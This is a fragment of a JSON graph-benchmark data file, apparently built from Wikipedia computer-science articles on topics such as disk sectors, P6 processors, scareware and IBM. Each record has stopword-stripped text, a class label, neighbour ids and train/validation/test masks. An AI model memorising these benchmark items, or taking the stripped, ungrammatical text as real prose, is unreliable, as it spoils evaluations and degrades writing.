storage devices 1970s ibm added fixed-block architecture direct access storage devices fba dasds line ckd dasd ckd dasd supported multiple variable length sectors ibm fba dasd supported sector sizes 512 1024 2048 4096 bytes 2000 industry trade organization international disk drive equipment materials association idema started work define implementation standards would govern sector size formats exceeding 512 bytes accommodate future increases data storage capacities.by end 2007 anticipation future idema standard samsung toshiba began shipments 1.8-inch hard disk drives 4096 byte sectors 2010 idema completed advanced format standard 4096 sector drives setting date transition 512 4096 byte sectors january 2011 manufacturers advanced format drives soon became prevalent sector specifically means physical disk area term block used loosely refer small chunk data block multiple meanings depending context context data storage filesystem block abstraction disk sectors possibly encompassing multiple sectors contexts may unit data stream unit operation utility example unix program dd allows one set block size used execution parameter codice_1 specifies size chunks data delivered dd unrelated sectors filesystem blocks linux disk sector size determined codice_2 block size determined codice_3 sector defined intersection radius track case early hard drives floppy disks sectors towards outside disk physically longer nearer spindle sector still contains number bytes outer sectors lower bit density inner ones inefficient use magnetic surface solution zone bit recording wherein disk divided zones encompassing small number contiguous tracks zone divided sectors sector similar physical size outer zones greater circumference inner zones allocated sectors known zoned bit rate consequence zone bit recording contiguous reads writes noticeably faster outer tracks corresponding lower block addresses inner tracks bits pass head rotation difference 25 1998 traditional 512-byte sector size identified one impediment increasing capacity time growing rate exceeding moore law increasing length data field implementation advanced format using 4096-byte sectors removed impediment increased efficiency data surface area five thirteen percent increasing strength ecc turn allowed higher capacity format standardized industry consortium 2005 2011 incorporated new products hard drive manufacturers",
    "neighbors": [
      2432,
      3841,
      10508,
      10382,
      6289,
      9874,
      6297,
      6939,
      7969,
      2221,
      7342,
      819,
      5816,
      3257,
      7229,
      8129,
      4563,
      7767,
      6494,
      5598,
      9319,
      11368,
      8301,
      8049,
      5492,
      8951,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3316,
    "label": 0,
    "text": "Lexical_choice:lexical choice lexical choice subtask natural language generation involves choosing content words nouns verbs adjectives adverbs generated text function words determiners example usually chosen realisation simplest type lexical choice involves mapping domain concept perhaps represented ontology word example concept finger might mapped word finger complex situation domain concept expressed using different words different situations example domain concept value-change expressed many ways sometimes words communicate additional contextual information example contextual information especially significant vague terms tall example 2m tall man tall 2m tall horse small lexical choice modules must informed linguistic knowledge system input data maps onto words question semantics also influenced syntactic factors collocation effects pragmatic factors context hence nlg systems need linguistic models meaning mapped words target domain genre nlg system genre tends important example verb veer specific meaning weather forecasts wind direction changing clockwise direction general english weather-forecast generator must aware genre-specific meaning cases major differences different people use word example people use evening mean 6pm others use mean midnight psycholinguists shown people speak agree common interpretation via lexical alignment something nlg systems yet ultimately lexical choice must deal fundamental issue language relates non-linguistic world example system chose colour terms red describe objects digital image would need know rgb pixel values could generally described red influenced visual lighting objects scene linguistic objects discussed context pragmatic connotations associated red example apple called red assumed ripe well colour red forth number algorithms models developed lexical choice research community example edmonds developed model choosing near-synonyms words similar core meanings different connotations however algorithms models widely used applied nlg systems systems instead often used quite simple computational models invested development effort linguistic analysis instead algorithm development",
    "neighbors": [
      2440,
      5508
    ],
    "mask": "None"
  },
  {
    "node_id": 3317,
    "label": 3,
    "text": "P6_(microarchitecture):p6 microarchitecture p6 microarchitecture sixth-generation intel x86 microarchitecture implemented pentium pro microprocessor introduced november 1995 frequently referred i686 succeeded netburst microarchitecture 2000 eventually revived pentium line microprocessors successor pentium variant p6 microarchitecture core microarchitecture turn also derived p6 microarchitecture p6 core sixth generation intel microprocessor x86 line first implementation p6 core pentium pro cpu 1995 immediate successor original pentium design p5 p6 processors dynamically translate ia-32 instructions sequences buffered risc-like micro-operations analyze reorder micro-operations order detect parallelizable operations may issued one execution unit pentium pro first x86 chip use technique — nexgen nx586 introduced 1994 also used — first intel x86 chip techniques first used x86 space p6 core include p6 architecture lasted three generations pentium pro pentium iii widely known low power consumption excellent integer performance relatively high instructions per cycle ipc p6 line processing cores succeeded netburst p68 architecture appeared introduction pentium 4 completely different design based use long pipelines favoured high clock speed cost lower ipc higher power consumption upon release pentium 4-m mobile pentium 4 quickly realized new mobile netburst processors ideal mobile computing netburst-based processors simply efficient per clock per watt compared p6 predecessors mobile pentium 4 processors ran much hotter pentium iii-m processors n't offer significant performance advantages inefficiency affected cooling system complexity also all-important battery life realizing new microarchitecture n't best choice mobile space intel went back drawing board design would optimally suited market segment result modernized p6 design called pentium design overview pentium power efficient x86 processor notebooks several years consuming maximum 27 watts maximum load 4-5 watts idle processing efficiency gains brought modernization allowed rival mobile pentium 4 clocked 1 ghz higher fastest-clocked mobile pentium 4 compared fastest-clocked pentium equipped much memory bus bandwidth first pentium family processors banias internally support pae show pae support flag cpuid information causes operating systems primarily linux distributions refuse boot processors since pae support required kernels yonah cpu launched january 2006 core brand single dual-core mobile version sold core solo core duo pentium dual-core brands server version released xeon lv processors provided partial solutions pentium shortcomings adding resulted interim microarchitecture low-voltage cpus part way p6 following core microarchitecture july 27 2006 core microarchitecture derivative p6 launched form core 2 processor subsequently processors released core microarchitecture core 2 xeon pentium celeron brand names core microarchitecture intel final mainstream processor line use fsb later intel processors based nehalem later intel microarchitectures featuring integrated memory controller qpi dmi bus communication rest system improvements relative intel core processors chips technically derivatives pentium pro architecture gone several radical changes since inception",
    "neighbors": [
      4108,
      9741,
      5649,
      7714,
      6192,
      2620,
      6730,
      2638,
      4185,
      1119,
      3175,
      4204,
      8815,
      8820,
      630,
      4217,
      8834,
      8325,
      7313,
      8851,
      6804,
      6815,
      9391,
      4276,
      2237,
      5309,
      6339,
      5844,
      3798,
      3294,
      10468,
      5356,
      5871,
      1776,
      3317,
      5883,
      5380,
      5892,
      5386,
      6926,
      4886,
      3352,
      799,
      10548,
      5444,
      9541,
      7505,
      8033,
      1915,
      5503,
      3457,
      3459,
      3973,
      9095,
      9611,
      398,
      3470,
      8590,
      5523,
      2455,
      9111,
      10669,
      10675,
      1461,
      8125,
      8126,
      1998,
      977,
      5073,
      7134,
      1000,
      7657,
      9707,
      1515,
      1005,
      8684,
      10734,
      499,
      3068
    ],
    "mask": "Test"
  },
  {
    "node_id": 3318,
    "label": 5,
    "text": "Data_link_connection_identifier:data link connection identifier data link connection identifier dlci frame relay 10-bit-wide link-local virtual circuit identifier used assign frames specific pvc svc frame relay networks use dlcis statistically multiplex frames dlcis preloaded switch act road signs traveling frames standard allows existence 1024 dlcis dlci 0 reserved ansi/q993a lmi standard—only numbers 16 976 usable end-user equipment dlci 1023 reserved cisco lmi however numbers 16 1007 usable summary using cisco lmi numbers 16 1007 available end-user equipment rest reserved various management purposes dlci layer 2 addresses locally significant two devices dlci mapped interface one frame relay cloud",
    "neighbors": [
      5437,
      835,
      1893
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3319,
    "label": 3,
    "text": "Freescale_683XX:freescale 683xx freescale 683xx formerly motorola 683xx family compatible microcontrollers use motorola 68000-based cpu core family designed using hardware description language making parts synthesizable amenable improved fabrication processes die shrinks two cpu cores used 683xx family 68ec000 cpu32 instruction set cpu32 core similar 68020 without bitfield instructions instructions unique cpu32 core table lookup interpolate instructions low-power stop mode modules microcontroller designed independently released new cpus could tested process let architects perform design-ahead silicon technologies available motorola designs ready implement go market many submodules carried forward coldfire line processors microcontrollers consist series modules connected internal bus modules available various processors 683xx family",
    "neighbors": [
      7299,
      3844,
      4868,
      1158,
      7302,
      9338,
      7305,
      10501,
      3467,
      1548,
      6415,
      2073,
      7065,
      4897,
      8102,
      5297,
      11314,
      11447,
      8761,
      6715,
      1983,
      10945,
      3017,
      2383,
      336,
      8530,
      3540,
      3159,
      3932,
      3936,
      869,
      7269,
      9964,
      1776,
      3185,
      8048,
      5235,
      10224,
      7286,
      8058,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 3320,
    "label": 4,
    "text": "Scareware:scareware scareware form malware uses social engineering cause shock anxiety perception threat order manipulate users buying unwanted software scareware part class malicious software includes rogue security software ransomware scam software tricks users believing computer infected virus suggests download pay fake antivirus software remove usually virus fictional software non-functional malware according anti-phishing working group number scareware packages circulation rose 2,850 9,287 second half 2008 first half 2009 apwg identified 585 increase scareware programs scareware label also apply application virus pranks users intent cause anxiety panic internet security writers use term scareware describe software products produce frivolous alarming warnings threat notices typically fictitious useless commercial firewall registry cleaner software class program tries increase perceived value bombarding user constant warning messages increase effectiveness way software packaged look feel mimics legitimate security software order deceive consumers websites display pop-up advertisement windows banners text computer may infected harmful spyware programs immediate removal may required scan click 'yes websites go far saying user job career marriage would risk products using advertisements often considered scareware serious scareware applications qualify rogue software scareware affiliated installed programs user encounter pop-up website indicating pc infected scenarios possible become infected scareware even user attempts cancel notification popups especially designed look like come user operating system actually webpage 2010 study google found 11,000 domains hosting fake anti-virus software accounting 50 malware delivered via internet advertising starting march 29 2011 1.5 million web sites around world infected lizamoon sql injection attack spread scareware research google discovered scareware using servers check internet connectivity data suggested million machines infected scareware company placed warning search results users whose computers appear infected another example scareware smart fortress site scares people thinking lots viruses computer asks buy professional service forms spyware also qualify scareware change user desktop background install icons computer notification area microsoft windows claiming kind spyware infected user computer scareware application help remove infection cases scareware trojans replaced desktop victim large yellow text reading warning spyware box containing similar text even forced screensaver change bugs crawling across screen winwebsec term usually used address malware attacks users windows operating system produces fake claims similar genuine anti-malware software spysheriff exemplifies spyware scareware purports remove spyware actually piece spyware often accompanying smitfraud infections antispyware scareware may promoted using phishing scam another approach trick users uninstalling legitimate antivirus software microsoft security essentials disabling firewall since antivirus programs typically include protection tampered disabled software scareware may use social engineering convince user disable programs would otherwise prevent malware working 2005 microsoft washington state successfully sued secure computer makers spyware cleaner 1 million charges using scareware pop-ups washington attorney general also brought lawsuits securelink networks high falls media makers quick shield october 2008 microsoft washington attorney general filed lawsuit two texas firms branch software alpha red producers registry cleaner xp scareware lawsuit alleges company sent incessant pop-ups resembling system warnings consumers personal computers stating critical error message registry damaged corrupted instructing users visit web site download registry cleaner xp cost 39.95 december 2 2008 u.s. federal trade commission ftc filed complaint federal court innovative marketing inc. bytehosting internet services llc well individuals sam jain daniel sundin james reno marc ’ souza kristy ross complaint also listed maurice ’ souza relief defendant alleged held proceeds wrongful conduct accusing violating law ftc alleged defendants violated ftc act deceptively marketing software including winfixer winantivirus drivecleaner errorsafe xp antivirus according complaint defendants falsely represented scans consumer computer showed compromised infected offered sell software fix alleged problems another type scareware involves software designed literally scare user use unanticipated shocking images sounds video",
    "neighbors": [
      3072,
      2049,
      3969,
      899,
      5764,
      6786,
      7044,
      8064,
      9351,
      1417,
      10245,
      8703,
      9227,
      6797,
      9102,
      9356,
      7441,
      8978,
      4863,
      4883,
      4245,
      278,
      4374,
      9233,
      10392,
      1690,
      2075,
      3867,
      9242,
      10141,
      5281,
      9761,
      2213,
      8998,
      9256,
      939,
      300,
      9771,
      2864,
      1970,
      6454,
      4023,
      10297,
      3643,
      6588,
      7739,
      10556,
      9791,
      1088,
      3395,
      8387,
      4165,
      5707,
      2508,
      467,
      10710,
      3032,
      4314,
      7515,
      9569,
      9187,
      3941,
      10756,
      11621,
      488,
      107,
      877,
      9591,
      4344,
      2041,
      127,
      5245,
      5886,
      1279
    ],
    "mask": "Test"
  },
  {
    "node_id": 3321,
    "label": 2,
    "text": "Setcontext:setcontext setcontext one family c library functions others getcontext makecontext swapcontext used context control codice_1 family allows implementation c advanced control flow patterns iterators fibers coroutines may viewed advanced version setjmp/longjmp whereas latter allows single non-local jump stack codice_1 allows creation multiple cooperative threads control stack codice_1 specified posix.1-2001 single unix specification version 2 unix-like operating systems provide posix.1-2004 obsoleted functions posix.1-2008 removed posix threads indicated possible replacement citing ieee std 1003.1 2004 edition incorporation iso/iec 9899:1999 standard specification found iso c standard subclause 6.11.6 specifies use function declarators empty parentheses obsolescent feature therefore using function prototype making use obsolescent feature iso c standard therefore strictly conforming posix application use form therefore use getcontext makecontext swapcontext marked obsolescent way iso c standard specify non-obsolescent function prototype indicating function called arbitrary number including zero arguments arbitrary types including integers pointers data pointers functions composite types functions associated types defined codice_4 system header file includes codice_5 type four functions operate codice_6 points context resumed current context exits context created codice_7 secondary context codice_8 used store set signals blocked context codice_9 stack used context codice_10 stores execution state including registers cpu flags instruction pointer stack pointer codice_11 opaque type functions example demonstrates iterator using codice_1 note example correct may work intended cases function codice_7 requires additional parameters type codice_36 example passes pointers thus example may fail 64-bit machines specifically lp64-architectures problem worked around breaking reconstructing 64-bit values introduces performance penalty get set context smaller context handy makes infinite loop context holds program counter",
    "neighbors": [
      9794,
      3076,
      2345,
      9911,
      7983,
      1776,
      5040,
      2804,
      5397,
      823,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3322,
    "label": 5,
    "text": "L2TPv3:l2tpv3 layer 2 tunnelling protocol version 3 ietf standard related l2tp used alternative protocol multiprotocol label switching mpls encapsulation multiprotocol layer 2 communications traffic ip networks like l2tp l2tpv3 provides pseudo-wire service scaled fit carrier requirements l2tpv3 regarded mpls ip atm simplified version concept much benefit achieved fraction effort cost losing technical features considered less important market case l2tpv3 features lost teletraffic engineering features considered important mpls however reason features could re-engineered top l2tpv3 later products protocol overhead l2tpv3 also significantly bigger mpls",
    "neighbors": [
      10242,
      3847,
      649,
      10889,
      9868,
      3218,
      8211,
      9365,
      10005,
      11413,
      5402,
      5531,
      11162,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      9764,
      4268,
      10924,
      10417,
      562,
      7859,
      2228,
      2996,
      9909,
      10171,
      3133,
      3006,
      4797,
      5181,
      3777,
      5437,
      2884,
      7364,
      2887,
      5959,
      8265,
      11468,
      2509,
      4687,
      7376,
      5843,
      11606,
      2904,
      2136,
      6490,
      9048,
      5084,
      5469,
      5470,
      5471,
      5472,
      6364,
      10210,
      10341,
      9318,
      8039,
      10344,
      11112,
      751,
      367,
      8432,
      11248,
      5749,
      9722,
      6651
    ],
    "mask": "Train"
  },
  {
    "node_id": 3323,
    "label": 7,
    "text": "IBM:ibm international business machines corporation ibm american multinational information technology company headquartered armonk new york operations 170 countries company began 1911 founded endicott new york computing-tabulating-recording company ctr renamed international business machines 1924 ibm produces sells computer hardware middleware software provides hosting consulting services areas ranging mainframe computers nanotechnology ibm also major research organization holding record u.s. patents generated business 26 consecutive years inventions ibm include automated teller machine atm floppy disk hard disk drive magnetic stripe card relational database sql programming language upc barcode dynamic random-access memory dram ibm mainframe exemplified system/360 dominant computing platform 1960s 1970s ibm continually shifted business operations focusing higher-value profitable markets includes spinning printer manufacturer lexmark 1991 sale personal computer thinkpad/thinkcentre x86-based server businesses lenovo 2005 2014 respectively acquiring companies pwc consulting 2002 spss 2009 weather company 2016 red hat 2019 also 2015 ibm announced would go fabless continuing design semiconductors offloading manufacturing globalfoundries nicknamed big blue ibm one 30 companies included dow jones industrial average one world largest employers 380,000 employees known ibmers least 70 ibmers based outside united states country largest number ibmers india ibm employees awarded five nobel prizes six turing awards ten national medals technology usa five national medals science usa 1880s technologies emerged would ultimately form core international business machines ibm julius e. pitrap patented computing scale 1885 alexander dey invented dial recorder 1888 herman hollerith 1860–1929 patented electric tabulating machine willard bundy invented time clock record worker arrival departure time paper tape 1889 june 16 1911 four companies amalgamated new york state charles ranlett flint forming fifth company computing-tabulating-recording company ctr based endicott new york five companies 1,300 employees offices plants endicott binghamton new york dayton ohio detroit michigan washington d.c. toronto manufactured machinery sale lease ranging commercial scales industrial time recorders meat cheese slicers tabulators punched cards thomas j. watson sr. fired national cash register company john henry patterson called flint 1914 offered position ctr watson joined ctr general manager 11 months later made president court cases relating time ncr resolved learned patterson pioneering business practices watson proceeded put stamp ncr onto ctr companies implemented sales conventions generous sales incentives focus customer service insistence well-groomed dark-suited salesmen evangelical fervor instilling company pride loyalty every worker favorite slogan think became mantra company employees watson first four years revenues reached 9 million company operations expanded europe south america asia australia watson never liked clumsy hyphenated name computing-tabulating-recording company february 14 1924 chose replace expansive title international business machines 1933 subsidiaries merged one company ibm 1937 ibm tabulating equipment enabled organizations process unprecedented amounts data clients including u.s. government first effort maintain employment records 26 million people pursuant social security act tracking persecuted groups hitler third reich largely german subsidiary dehomag 1949 thomas watson sr. created ibm world trade corporation subsidiary ibm focused foreign operations 1952 stepped almost 40 years company helm son thomas watson jr. named president 1956 company demonstrated first practical example artificial intelligence arthur l. samuel ibm poughkeepsie new york laboratory programmed ibm 704 merely play checkers learn experience 1957 fortran scientific programming language developed 1961 ibm developed sabre reservation system american airlines introduced highly successful selectric typewriter 1963 ibm employees computers helped nasa track orbital flights mercury astronauts year later moved corporate headquarters new york city armonk new york latter half 1960s saw ibm continue support space exploration participating 1965 gemini flights 1966 saturn flights 1969 lunar mission april 7 1964 ibm announced first computer system family ibm system/360 spanned complete range commercial scientific applications large small allowing companies first time upgrade models greater computing capability without rewrite applications followed ibm system/370 1970 together 360 370 made ibm mainframe dominant mainframe computer dominant computing platform industry throughout period early 1980s operating systems ran os/vs1 mvs middleware built top cics transaction processing monitor near-monopoly-level hold computer industry became almost synonymous ibm products due marketshare 1974 ibm engineer george j. laurer developed universal product code ibm world bank first introduced financial swaps public 1981 entered swap agreement ibm pc originally designated ibm 5150 introduced 1981 soon became industry standard 1991 ibm spun printer manufacturing new business called lexmark 1993 ibm posted us 8 billion loss – time biggest american corporate history lou gerstner hired ceo rjr nabisco turn company around 2002 ibm acquired pwc consulting 2003 initiated project redefine company values hosting three-day online discussion key business issues 50,000 employees result three values dedication every client success innovation matters—for company world trust personal responsibility relationships 2005 company sold personal computer business chinese technology company lenovo 2009 acquired software company spss inc. later 2009 ibm blue gene supercomputing program awarded national medal technology innovation u.s. president barack obama 2011 ibm gained worldwide attention artificial intelligence program watson exhibited jeopardy game-show champions ken jennings brad rutter company also celebrated 100th anniversary year june 16 2012 ibm announced agreed buy kenexa year later also acquired softlayer technologies web hosting service deal worth around 2 billion 2014 ibm announced would sell x86 server division lenovo 2.1 billion also year ibm began announcing several major partnerships companies including apple inc. twitter facebook tencent cisco underarmour box microsoft vmware csc macy sesame workshop parent company sesame street salesforce.com 2015 ibm announced three major acquisitions merge healthcare 1 billion data storage vendor cleversafe digital assets weather company including weather.com weather channel mobile app also year ibmers created film boy atom first molecule movie tell story 2016 ibm acquired video conferencing service ustream formed new cloud video unit april 2016 posted 14-year low quarterly sales following month groupon sued ibm accusing patent infringement two months ibm accused groupon patent infringement separate lawsuit 2015 ibm bought digital part weather company october 2018 ibm announced intention acquire red hat 34 billion acquisition completed july 9 2019 june 2019 ibm cut 2,000 jobs ibm headquartered armonk new york community north midtown manhattan principal building referred chq glass stone edifice parcel amid 432-acre former apple orchard company purchased mid-1950s two ibm buildings within walking distance chq north castle office previously served ibm headquarters louis v. gerstner jr. center learning formerly known ibm learning center ilc resort hotel training center 182 guest rooms 31 meeting rooms various amenities ibm operates 174 countries mobility centers smaller markets areas major campuses larger ones new york city ibm several offices besides chq including ibm watson headquarters astor place manhattan outside new york major campuses united states include austin texas research triangle park raleigh-durham north carolina rochester minnesota silicon valley california ibm real estate holdings varied globally diverse towers occupied ibm include 1250 rené-lévesque montreal canada tour descartes paris france one atlantic center atlanta georgia usa beijing china ibm occupies pangu plaza city seventh tallest building overlooking beijing national stadium bird nest home 2008 summer olympics ibm india private limited indian subsidiary ibm headquartered bengaluru karnataka facilities bengaluru ahmedabad delhi kolkata mumbai chennai pune gurugram noida bhubaneshwar coimbatore visakhapatnam hyderabad notable buildings include ibm rome software lab rome italy hursley house winchester uk 330 north wabash chicago illinois united states cambridge scientific center cambridge massachusetts united states ibm toronto software lab toronto canada ibm building johannesburg johannesburg south africa ibm building seattle seattle washington united states ibm hakozaki facility tokyo japan ibm yamato facility yamato japan ibm canada head office building ontario canada watson iot headquarters munich germany defunct ibm campuses include ibm somers office complex somers new york company contributions industrial architecture design include works eero saarinen ludwig mies van der rohe i.m pei van der rohe building chicago recognized 1990 honor award national building museum ibm recognized one top 20 best workplaces commuters united states environmental protection agency epa 2005 recognized fortune 500 companies provided employees excellent commuter benefits help reduce traffic air pollution 2004 concerns raised related ibm contribution early days pollution original location endicott new york fiscal year 2017 ibm reported earnings us 5.7 billion annual revenue us 79.1 billion decline 1.0 previous fiscal cycle ibm shares traded 125 per share market capitalization valued us 113.9 billion september 2018 ibm ranked 34 2018 fortune 500 rankings largest united states corporations total revenue ibm large diverse portfolio products services offerings fall categories cloud computing artificial intelligence commerce data analytics internet things iot infrastructure mobile security ibm cloud includes infrastructure service iaas software service saas platform service paas offered public private hybrid cloud delivery models instance ibm bluemix paas enables developers quickly create complex websites pay-as-you-go model ibm softlayer dedicated server managed hosting cloud computing provider 2011 reported hosting 81,000 servers 26,000 customers ibm also provides cloud data encryption services icdes using cryptographic splitting secure customer data ibm also hosts industry-wide cloud computing mobile technologies conference interconnect year hardware designed ibm categories include ibm power microprocessors employed inside many console gaming systems including xbox 360 playstation 3 nintendo wii u. ibm secure blue encryption hardware built microprocessors 2014 company revealed truenorth neuromorphic cmos integrated circuit announced 3 billion investment following five years design neural chip mimics human brain 10 billion neurons 100 trillion synapses uses 1 kilowatt power 2016 company launched all-flash arrays designed small midsized companies includes software data compression provisioning snapshots across various systems outsourcing also represents major service provided ibm 40 data centers worldwide alphaworks ibm source emerging software technologies spss software package used statistical analysis ibm kenexa suite provides employment retention solutions includes brassring applicant tracking system used thousands companies recruiting ibm also owns weather company provides weather forecasting includes weather.com weather underground smarter planet initiative seeks achieve economic growth near-term efficiency sustainable development societal progress targeting opportunities smart grids water management systems solutions traffic congestion greener buildings services provisions include redbooks publicly available online books best practices ibm products developerworks website software developers professionals how-to articles tutorials well software downloads code samples discussion forums podcasts blogs wikis resources developers technical professionals ibm watson technology platform uses natural language processing machine learning reveal insights large amounts unstructured data watson debuted 2011 american game-show jeopardy competed champions ken jennings brad rutter three-game tournament watson since applied business healthcare developers universities example ibm partnered memorial sloan kettering cancer center assist considering treatment options oncology patients melanoma screenings also several companies begun using watson call centers either replacing assisting customer service agents january 2019 ibm introduced first commercial quantum computer ibm q system one ibm also provides infrastructure new york city police department ibm cognos analytics perform data visualizations compstat crime data research part ibm since founding organized efforts trace roots back 1945 watson scientific computing laboratory founded columbia university new york city converting renovated fraternity house manhattan west side ibm first laboratory ibm research constitutes largest industrial research organization world 12 labs 6 continents ibm research headquartered thomas j. watson research center new york facilities include almaden lab california austin lab texas australia lab melbourne brazil lab são paulo rio de janeiro china lab beijing shanghai ireland lab dublin haifa lab israel india lab delhi bangalore tokyo lab zurich lab africa lab nairobi terms investment ibm r expenditure totals several billion dollars year 2012 expenditure approximately us 6.9 billion recent allocations included 1 billion create business unit watson 2014 3 billion create next-gen semiconductor along 4 billion towards growing company strategic imperatives cloud analytics mobile security social 2015 ibm leading proponent open source initiative began supporting linux 1998 company invests billions dollars services software based linux ibm linux technology center includes 300 linux kernel developers ibm also released code different open source licenses platform-independent software framework eclipse worth approximately us 40 million time donation three-sentence international components unicode icu license java-based relational database management system rdbms apache derby ibm open source involvement trouble-free however see sco v. ibm famous inventions developments ibm include automated teller machine atm dynamic random access memory dram electronic keypunch financial swap floppy disk hard disk drive magnetic stripe card relational database risc sabre airline reservation system sql universal product code upc bar code virtual machine additionally 1990 company scientists used scanning tunneling microscope arrange 35 individual xenon atoms spell company acronym marking first structure assembled one atom time major part ibm research generation patents since first patent traffic signaling device ibm one world prolific patent sources 2018 company holds record patents generated business marking 25 consecutive years achievement five ibmers received nobel prize leo esaki thomas j. watson research center yorktown heights n.y. 1973 work semiconductors gerd binnig heinrich rohrer zurich research center 1986 scanning tunneling microscope georg bednorz alex müller also zurich 1987 research superconductivity several ibmers also turing award including first female recipient frances e. allen current research includes collaboration university michigan see computers act academic advisor undergraduate computer science engineering students university partnership combining cloud internet things iot platforms make interoperable provide developers easier tools company also involved research advanced algorithms machine learning decision-making processes end company recently released analysis tool algorithms make decisions scanning biases automated decision-making ibm nicknamed big blue part due blue logo color scheme also partially since ibm de facto dress code white shirts blue suits company logo undergone several changes years current 8-bar logo designed 1972 graphic designer paul rand general replacement 13-bar logo since period photocopiers render large areas well aside logo ibm used helvetica corporate typeface 50 years replaced 2017 custom-designed ibm plex ibm valuable brand result 100 years operations marketing campaigns since 1996 ibm exclusive technology partner masters tournament one four major championships professional golf ibm creating first masters.org 1996 first course cam 1998 first iphone app live streaming 2009 first-ever live 4k ultra high definition feed united states major sporting event 2016 result ibm ceo ginni rometty became third female member master governing body augusta national golf club ibm also major sponsor professional tennis engagements u.s. open wimbledon australian open french open company also sponsored olympic games 1960–2000 national football league 2003–2012 2012 ibm brand valued 75.5 billion ranked interbrand second-best brand worldwide year also ranked top company leaders fortune number two green company u.s. newsweek second-most respected company barron fifth-most admired company fortune 18th-most innovative company fast company number one technology consulting number two outsourcing vault 2015 forbes ranked ibm fifth-most valuable brand january 1969 last day johnson administration united states department justice antitrust division filed suit ibm alleging company engaged monopolistic business practices talks ibm would agree settlement consent decree two sides unable come terms case went trial 1975 legal matter justice department estimated would take 60 days three years millions pages evidence justice department decided drop suit new york times article states ibm never publicly disclosed much spent defending suit estimated tens millions dollars ibm one largest workforces world employees big blue referred ibmers company among first corporations provide group life insurance 1934 survivor benefits 1935 training women 1935 paid vacations 1937 training disabled people 1942 ibm hired first black salesperson 1946 1952 ceo thomas j. watson jr. published company first written equal opportunity policy letter one year u.s. supreme court decision brown vs. board education 11 years civil rights act 1964 human rights campaign rated ibm 100 index gay-friendliness every year since 2003 ibm providing same-sex partners employees health benefits anti-discrimination clause additionally 2005 ibm became first major company world commit formally use genetic information employment decisions 2017 ibm named working mother 100 best companies list 32nd consecutive year ibm several leadership development recognition programs recognize employee potential achievements early-career high potential employees ibm sponsors leadership development programs discipline e.g. general management gmldp human resources hrldp finance fldp year company also selects 500 ibmers ibm corporate service corps csc described corporate equivalent peace corps gives top employees month humanitarian work abroad certain interns ibm also program called extreme blue partners top business technical students develop high-value technology compete present business case company ceo internship end company also various designations exceptional individual contributors senior technical staff member stsm research staff member rsm distinguished engineer de distinguished designer dd prolific inventors also achieve patent plateaus earn designation master inventor company prestigious designation ibm fellow since 1963 company names handful fellows year based technical achievement programs recognize years service quarter century club established 1924 sellers eligible join hundred percent club composed ibm salesmen meet quotas convened atlantic city new jersey year company also selects 1,000 ibmers annually award best ibm award includes all-expenses paid trip awards ceremony exotic location ibm culture evolved significantly century operations early days dark gray suit white shirt sincere tie constituted public uniform ibm employees ibm management transformation 1990s ceo louis v. gerstner jr. relaxed codes normalizing dress behavior ibm employees company culture also given different plays company acronym ibm saying stands 've moved due relocations layoffs others saying stands 'm pursuant prevalent work-from-anywhere norm others saying stands 'm mentored due company open door policy encouragement mentoring levels terms labor relations company traditionally resisted labor union organizing although unions represent ibm workers outside united states japan ibm employees also american football team complete pro stadium cheerleaders televised games competing japanese x-league big blue 2015 ibm started giving employees option choosing either pc mac primary work device resulting ibm becoming world largest mac shop 2016 ibm eliminated forced rankings changed annual performance review system focus frequent feedback coaching skills development many ibmers also achieved notability outside work leaving ibm business former ibm employees include apple inc. ceo tim cook former eds ceo politician ross perot microsoft chairman john w. thompson sap co-founder hasso plattner gartner founder gideon gartner advanced micro devices amd ceo lisa su former citizens financial group ceo ellen alemany former yahoo chairman alfred amoroso former ceo c. michael armstrong former xerox corporation ceos david t. kearns g. richard thoman former fair isaac corporation ceo mark n. greene citrix systems co-founder ed iacobucci asos.com chairman brian mcbride former lenovo ceo steve ward former teradata ceo kenneth simonds government alumna patricia roberts harris served united states secretary housing urban development first african american woman serve united states cabinet samuel k. skinner served u.s. secretary transportation white house chief staff alumni also include u.s senators mack mattingly thom tillis wisconsin governor scott walker former u.s ambassadors vincent obsitnik slovakia arthur k. watson france thomas watson jr. soviet union former u.s representatives todd akin glenn andrews robert garcia katherine harris amo houghton jim ross lightfoot thomas j. manton donald w. riegle jr. ed zschau others nasa astronaut michael j. massimino canadian astronaut governor-general julie payette harvey mudd college president maria klawe western governors university president emeritus robert mendenhall former university kentucky president lee t. todd jr. nfl referee bill carollo former rangers f.c chairman john mcclelland recipient nobel prize literature j. m. coetzee thomas watson jr. also served 11th national president boy scouts america company 14 member board directors responsible overall corporate management includes ceos american express ford motor company boeing dow chemical johnson johnson cemex well president rensselaer polytechnic institute 2011 ibm became first technology company warren buffett holding company berkshire hathaway invested initially bought 64 million shares costing 10.5 billion dollars years increased ibm holdings however reduced 94.5 2.05 million shares end 2017 may 2018 completely ibm",
    "neighbors": [
      6148,
      7,
      6153,
      8201,
      8203,
      6157,
      8208,
      10265,
      10267,
      2077,
      10273,
      8227,
      8231,
      10280,
      2089,
      8233,
      10283,
      10286,
      8241,
      10289,
      4149,
      2106,
      6207,
      2112,
      10303,
      10316,
      6221,
      10320,
      2132,
      10325,
      6230,
      2138,
      6234,
      6235,
      8287,
      4194,
      6242,
      10340,
      10342,
      4201,
      2155,
      8301,
      2158,
      2159,
      8302,
      2161,
      4211,
      2165,
      118,
      2168,
      8312,
      2172,
      125,
      6268,
      134,
      135,
      6282,
      4236,
      6284,
      2190,
      10382,
      2193,
      4243,
      4244,
      10389,
      2201,
      4252,
      10396,
      4255,
      2211,
      8355,
      2213,
      8356,
      6311,
      10413,
      4270,
      10415,
      10417,
      178,
      6325,
      10427,
      2238,
      4291,
      6342,
      10438,
      6344,
      8393,
      10441,
      6353,
      4306,
      211,
      6356,
      2263,
      6366,
      6367,
      8416,
      2273,
      10465,
      10471,
      4331,
      4334,
      242,
      8440,
      10501,
      2314,
      10508,
      271,
      2322,
      8478,
      290,
      295,
      2345,
      6442,
      10236,
      10541,
      10543,
      306,
      8502,
      4408,
      4409,
      314,
      10553,
      4412,
      317,
      10557,
      10560,
      8517,
      2380,
      4429,
      2383,
      6483,
      342,
      4438,
      2395,
      349,
      4447,
      6495,
      8543,
      6503,
      8553,
      10601,
      4463,
      2416,
      8561,
      6514,
      375,
      10615,
      6529,
      8578,
      4483,
      6532,
      4492,
